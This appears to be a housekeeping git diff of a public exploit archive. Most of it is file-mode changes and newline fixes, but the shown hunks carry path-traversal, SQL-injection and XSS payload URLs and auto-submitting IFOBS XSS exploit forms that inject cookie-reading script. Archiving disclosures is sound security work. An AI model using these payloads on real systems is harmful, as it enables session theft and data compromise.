f835210a6..e60c3ddbf --- a/platforms/jsp/webapps/34440.txt +++ b/platforms/jsp/webapps/34440.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow an attacker to inject and execute arbitrary JSP The following example URI is available: -ttp://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp \ No newline at end of file +ttp://www.example.com/sitemindermonitor/doSave.jsp?file=../attacksample.jsp \ No newline at end of file diff --git a/platforms/jsp/webapps/34518.txt b/platforms/jsp/webapps/34518.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34519.txt b/platforms/jsp/webapps/34519.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34834.txt b/platforms/jsp/webapps/34834.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/34928.txt b/platforms/jsp/webapps/34928.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35079.txt b/platforms/jsp/webapps/35079.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35127.txt b/platforms/jsp/webapps/35127.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35169.txt b/platforms/jsp/webapps/35169.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35181.txt b/platforms/jsp/webapps/35181.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35209.txt b/platforms/jsp/webapps/35209.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35222.txt b/platforms/jsp/webapps/35222.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35594.txt b/platforms/jsp/webapps/35594.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35672.txt b/platforms/jsp/webapps/35672.txt old mode 100755 new mode 100644 index f587405e2..f7e8432a2 --- a/platforms/jsp/webapps/35672.txt +++ b/platforms/jsp/webapps/35672.txt @@ -5,4 +5,4 @@ Cisco Unified Communications Manager is prone to multiple SQL-injection vulnerab Exploiting this issue could allow an authenticated attacker to compromise the affected device, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||0/1%20OR%201=1))%20-- -http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20-- \ No newline at end of file +http://www.example.com/ccmcip/xmldirectorylist.jsp?f=vsr'||1/0%20OR%201=1))%20-- \ No newline at end of file diff --git a/platforms/jsp/webapps/35706.txt b/platforms/jsp/webapps/35706.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35707.txt b/platforms/jsp/webapps/35707.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35890.txt b/platforms/jsp/webapps/35890.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35891.txt b/platforms/jsp/webapps/35891.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35904.txt b/platforms/jsp/webapps/35904.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/35910.txt b/platforms/jsp/webapps/35910.txt old mode 100755 new mode 100644 index 8087a4f79..307ad02ec --- a/platforms/jsp/webapps/35910.txt +++ b/platforms/jsp/webapps/35910.txt @@ -52,6 +52,4 @@ http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt Sobhan system Co. Signal Network And Security Group (www.signal-net.net) -E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net - - \ No newline at end of file +E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net \ No newline at end of file diff --git a/platforms/jsp/webapps/36002.txt b/platforms/jsp/webapps/36002.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36275.txt b/platforms/jsp/webapps/36275.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36353.txt b/platforms/jsp/webapps/36353.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36354.txt b/platforms/jsp/webapps/36354.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36355.txt b/platforms/jsp/webapps/36355.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36356.txt b/platforms/jsp/webapps/36356.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36357.txt b/platforms/jsp/webapps/36357.txt old mode 100755 new mode 100644 index 63fe8b7e4..48acb3d03 --- a/platforms/jsp/webapps/36357.txt +++ b/platforms/jsp/webapps/36357.txt @@ -4,4 +4,4 @@ HP Network Node Manager i is prone to multiple unspecified cross-site scripting An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/protected/traceroute.jsp?nodename=[xss] \ No newline at end of file +http://www.example.com/protected/traceroute.jsp?nodename=[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/36678.txt b/platforms/jsp/webapps/36678.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/36929.txt b/platforms/jsp/webapps/36929.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37114.txt b/platforms/jsp/webapps/37114.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37152.txt b/platforms/jsp/webapps/37152.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37220.txt b/platforms/jsp/webapps/37220.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37221.txt b/platforms/jsp/webapps/37221.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37260.txt b/platforms/jsp/webapps/37260.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37272.txt b/platforms/jsp/webapps/37272.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37441.txt b/platforms/jsp/webapps/37441.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37467.txt b/platforms/jsp/webapps/37467.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/37550.txt b/platforms/jsp/webapps/37550.txt old mode 100755 new mode 100644 index 8d7ce031a..068ffc6c8 --- a/platforms/jsp/webapps/37550.txt +++ b/platforms/jsp/webapps/37550.txt @@ -8,4 +8,4 @@ DataWatch Monarch Business Intelligence 5.1 is vulnerable; other versions may al http://www.example.com/ESAdmin/jsp/tabview.jsp?mode=add</script><script>alert(1)</script>&type=2&renew=1&pageid=PAGE_MPROCESS -http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp \ No newline at end of file +http://www.example.com/ESClient/jsp/customizedialog.jsp?templateType=-1&doctypeid=122&activetab=DM_DOCUMENT_LIST&fields=filter;sort;summary;&searchtype=document'&doclist.jsp \ No newline at end of file diff --git a/platforms/jsp/webapps/37802.html b/platforms/jsp/webapps/37802.html old mode 100755 new mode 100644 index 683ee4994..74716acc8 --- a/platforms/jsp/webapps/37802.html +++ b/platforms/jsp/webapps/37802.html @@ -4,4 +4,4 @@ IFOBS is prone to multiple HTML-injection vulnerabilities. Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible. -IFOBS XSS-1.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="secondName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-2.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="firstName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-3.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="thirdName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-4.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthDay" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-5.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthMonth" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> \ No newline at end of file +IFOBS XSS-1.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="secondName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-2.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="firstName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-3.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="thirdName" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-4.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthDay" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> IFOBS XSS-5.html <html> <head> <title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/ifobsClient/regclientprint.jsp"; method="post"> <input type="hidden" name="BirthMonth" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="BirthYear" value="2012"> <input type="hidden" name="myaction" value="1"> </form> </body> </html> \ No newline at end of file diff --git a/platforms/jsp/webapps/38098.txt b/platforms/jsp/webapps/38098.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38188.txt b/platforms/jsp/webapps/38188.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38189.txt b/platforms/jsp/webapps/38189.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38190.txt b/platforms/jsp/webapps/38190.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38191.txt b/platforms/jsp/webapps/38191.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38192.txt b/platforms/jsp/webapps/38192.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38235.txt b/platforms/jsp/webapps/38235.txt old mode 100755 new mode 100644 index d61d84b60..698b32e86 --- a/platforms/jsp/webapps/38235.txt +++ b/platforms/jsp/webapps/38235.txt @@ -26,4 +26,4 @@ http://www.example.com/Filter=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3 http://www.example.com/Filter=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Asc=hi&Max=10&Jsf=Job&Jsf=Status&Jsf=User&Jsf=Date&Jsf=Description&Show=Filter -http://www.example.com/UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter \ No newline at end of file +http://www.example.com/UpToVal=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&User=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Max=50&PatVal=...+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&Client=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%280%29%3B%3E&AllC=y&Show=Filter \ No newline at end of file diff --git a/platforms/jsp/webapps/38334.txt b/platforms/jsp/webapps/38334.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38338.txt b/platforms/jsp/webapps/38338.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38395.txt b/platforms/jsp/webapps/38395.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38460.txt b/platforms/jsp/webapps/38460.txt old mode 100755 new mode 100644 index 557be0530..452fffedf --- a/platforms/jsp/webapps/38460.txt +++ b/platforms/jsp/webapps/38460.txt @@ -4,4 +4,4 @@ jPlayer is prone to a cross-site scripting vulnerability because it fails to suf An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write \ No newline at end of file +http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write \ No newline at end of file diff --git a/platforms/jsp/webapps/38645.txt b/platforms/jsp/webapps/38645.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38646.txt b/platforms/jsp/webapps/38646.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/38816.html b/platforms/jsp/webapps/38816.html old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39142.txt b/platforms/jsp/webapps/39142.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39143.txt b/platforms/jsp/webapps/39143.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39402.txt b/platforms/jsp/webapps/39402.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39664.txt b/platforms/jsp/webapps/39664.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39667.txt b/platforms/jsp/webapps/39667.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39687.txt b/platforms/jsp/webapps/39687.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39720.txt b/platforms/jsp/webapps/39720.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39780.txt b/platforms/jsp/webapps/39780.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/39880.txt b/platforms/jsp/webapps/39880.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40050.txt b/platforms/jsp/webapps/40050.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40060.txt b/platforms/jsp/webapps/40060.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40065.txt b/platforms/jsp/webapps/40065.txt old mode 100755 new mode 100644 index 29d08a7cf..ac4dca4c3 --- a/platforms/jsp/webapps/40065.txt +++ b/platforms/jsp/webapps/40065.txt @@ -678,4 +678,4 @@ Update to version 4.0.2 --- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file +-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream \ No newline at end of file diff --git a/platforms/jsp/webapps/40216.txt b/platforms/jsp/webapps/40216.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40229.txt b/platforms/jsp/webapps/40229.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40239.txt b/platforms/jsp/webapps/40239.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40240.txt b/platforms/jsp/webapps/40240.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40241.txt b/platforms/jsp/webapps/40241.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40242.txt b/platforms/jsp/webapps/40242.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40324.txt b/platforms/jsp/webapps/40324.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40325.html b/platforms/jsp/webapps/40325.html old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40326.txt b/platforms/jsp/webapps/40326.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40327.txt b/platforms/jsp/webapps/40327.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40328.html b/platforms/jsp/webapps/40328.html old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/40989.txt b/platforms/jsp/webapps/40989.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/41499.txt b/platforms/jsp/webapps/41499.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/41577.txt b/platforms/jsp/webapps/41577.txt old mode 100755 new mode 100644 index a91f2d3a3..bfe1c133b --- a/platforms/jsp/webapps/41577.txt +++ b/platforms/jsp/webapps/41577.txt @@ -36,5 +36,4 @@ Timeline: 12/1/2016 - Received response from vendor ("Thanks for the info...") 2/27/2017 - Followed up with contact and intent to disclose. No reply. 3/10/2017 - Disclosure -################################################################## - \ No newline at end of file +################################################################## \ No newline at end of file diff --git a/platforms/jsp/webapps/41926.txt b/platforms/jsp/webapps/41926.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42340.txt b/platforms/jsp/webapps/42340.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42437.html b/platforms/jsp/webapps/42437.html old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42438.txt b/platforms/jsp/webapps/42438.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42439.txt b/platforms/jsp/webapps/42439.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42519.txt b/platforms/jsp/webapps/42519.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42939.txt b/platforms/jsp/webapps/42939.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42940.txt b/platforms/jsp/webapps/42940.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/42966.py b/platforms/jsp/webapps/42966.py index 23fe02b83..11d3e20e1 100755 --- a/platforms/jsp/webapps/42966.py +++ b/platforms/jsp/webapps/42966.py @@ -209,4 +209,4 @@ else: createPayload(str(i)+"/",checker) con=getContent(str(i)+"/",checker) if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con: - print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" + print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m" \ No newline at end of file diff --git a/platforms/jsp/webapps/5112.txt b/platforms/jsp/webapps/5112.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/7075.txt b/platforms/jsp/webapps/7075.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/9887.txt b/platforms/jsp/webapps/9887.txt old mode 100755 new mode 100644 diff --git a/platforms/jsp/webapps/9958.txt b/platforms/jsp/webapps/9958.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/dos/21224.c b/platforms/lin_x86-64/dos/21224.c old mode 100755 new mode 100644 index 9a4133caf..cbff30b60 --- a/platforms/lin_x86-64/dos/21224.c +++ b/platforms/lin_x86-64/dos/21224.c @@ -1,9 +1,10 @@ +/* source: http://www.securityfocus.com/bid/55471/info Oracle VM VirtualBox is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. - +*/ /** This software is provided by the copyright owner "as is" and any * expressed or implied warranties, including, but not limited to, diff --git a/platforms/lin_x86-64/dos/33585.txt b/platforms/lin_x86-64/dos/33585.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/dos/36266.c b/platforms/lin_x86-64/dos/36266.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/dos/37868.txt b/platforms/lin_x86-64/dos/37868.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/dos/37876.txt b/platforms/lin_x86-64/dos/37876.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/dos/37879.txt b/platforms/lin_x86-64/dos/37879.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/dos/37880.txt b/platforms/lin_x86-64/dos/37880.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/15023.c b/platforms/lin_x86-64/local/15023.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/15024.c b/platforms/lin_x86-64/local/15024.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/24555.c b/platforms/lin_x86-64/local/24555.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/24746.c b/platforms/lin_x86-64/local/24746.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/26131.c b/platforms/lin_x86-64/local/26131.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/31347.c b/platforms/lin_x86-64/local/31347.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/32751.c b/platforms/lin_x86-64/local/32751.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/33516.c b/platforms/lin_x86-64/local/33516.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/33589.c b/platforms/lin_x86-64/local/33589.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/34134.c b/platforms/lin_x86-64/local/34134.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/35472.txt b/platforms/lin_x86-64/local/35472.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/36310.txt b/platforms/lin_x86-64/local/36310.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/36311.txt b/platforms/lin_x86-64/local/36311.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/37722.c b/platforms/lin_x86-64/local/37722.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/40049.c b/platforms/lin_x86-64/local/40049.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/40811.c b/platforms/lin_x86-64/local/40811.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/40871.c b/platforms/lin_x86-64/local/40871.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/42275.c b/platforms/lin_x86-64/local/42275.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/4460.c b/platforms/lin_x86-64/local/4460.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/local/9083.c b/platforms/lin_x86-64/local/9083.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/remote/32277.txt b/platforms/lin_x86-64/remote/32277.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13296.c b/platforms/lin_x86-64/shellcode/13296.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13320.c b/platforms/lin_x86-64/shellcode/13320.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13463.c b/platforms/lin_x86-64/shellcode/13463.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13464.s b/platforms/lin_x86-64/shellcode/13464.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13670.c b/platforms/lin_x86-64/shellcode/13670.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13688.c b/platforms/lin_x86-64/shellcode/13688.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13691.c b/platforms/lin_x86-64/shellcode/13691.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13908.c b/platforms/lin_x86-64/shellcode/13908.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13915.txt b/platforms/lin_x86-64/shellcode/13915.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/13943.c b/platforms/lin_x86-64/shellcode/13943.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/14305.c b/platforms/lin_x86-64/shellcode/14305.c old mode 100755 new mode 100644 index 9c001d897..0dc0f7afd --- a/platforms/lin_x86-64/shellcode/14305.c +++ b/platforms/lin_x86-64/shellcode/14305.c @@ -45,4 +45,4 @@ int main() (*(void(*)()) shellcode)(); return 0; -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/18197.c b/platforms/lin_x86-64/shellcode/18197.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/18585.s b/platforms/lin_x86-64/shellcode/18585.s old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/34667.c b/platforms/lin_x86-64/shellcode/34667.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/35205.txt b/platforms/lin_x86-64/shellcode/35205.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/35586.c b/platforms/lin_x86-64/shellcode/35586.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/35587.c b/platforms/lin_x86-64/shellcode/35587.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/36359.c b/platforms/lin_x86-64/shellcode/36359.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/36858.c b/platforms/lin_x86-64/shellcode/36858.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/37362.c b/platforms/lin_x86-64/shellcode/37362.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/37401.asm b/platforms/lin_x86-64/shellcode/37401.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/38150.txt b/platforms/lin_x86-64/shellcode/38150.txt old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/38239.asm b/platforms/lin_x86-64/shellcode/38239.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/38469.c b/platforms/lin_x86-64/shellcode/38469.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/38708.asm b/platforms/lin_x86-64/shellcode/38708.asm old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/38815.c b/platforms/lin_x86-64/shellcode/38815.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39149.c b/platforms/lin_x86-64/shellcode/39149.c old mode 100755 new mode 100644 index 2ec19edfd..df4428d39 --- a/platforms/lin_x86-64/shellcode/39149.c +++ b/platforms/lin_x86-64/shellcode/39149.c @@ -154,6 +154,4 @@ main() ret(); -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39152.c b/platforms/lin_x86-64/shellcode/39152.c old mode 100755 new mode 100644 index 763f47a92..3936f46b3 --- a/platforms/lin_x86-64/shellcode/39152.c +++ b/platforms/lin_x86-64/shellcode/39152.c @@ -199,6 +199,4 @@ main() ret(); -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39185.c b/platforms/lin_x86-64/shellcode/39185.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39203.c b/platforms/lin_x86-64/shellcode/39203.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39312.c b/platforms/lin_x86-64/shellcode/39312.c old mode 100755 new mode 100644 index 68d22af65..c8d33eb50 --- a/platforms/lin_x86-64/shellcode/39312.c +++ b/platforms/lin_x86-64/shellcode/39312.c @@ -60,6 +60,4 @@ main() ret(); -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39383.c b/platforms/lin_x86-64/shellcode/39383.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39388.c b/platforms/lin_x86-64/shellcode/39388.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39390.c b/platforms/lin_x86-64/shellcode/39390.c old mode 100755 new mode 100644 index 1828c606d..ffd9e6699 --- a/platforms/lin_x86-64/shellcode/39390.c +++ b/platforms/lin_x86-64/shellcode/39390.c @@ -47,6 +47,4 @@ main() ret(); -} - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39578.c b/platforms/lin_x86-64/shellcode/39578.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39617.c b/platforms/lin_x86-64/shellcode/39617.c old mode 100755 new mode 100644 diff --git a/platforms/lin_x86-64/shellcode/39624.c b/platforms/lin_x86-64/shellcode/39624.c old mode 100755 new mode 100644 diff --git 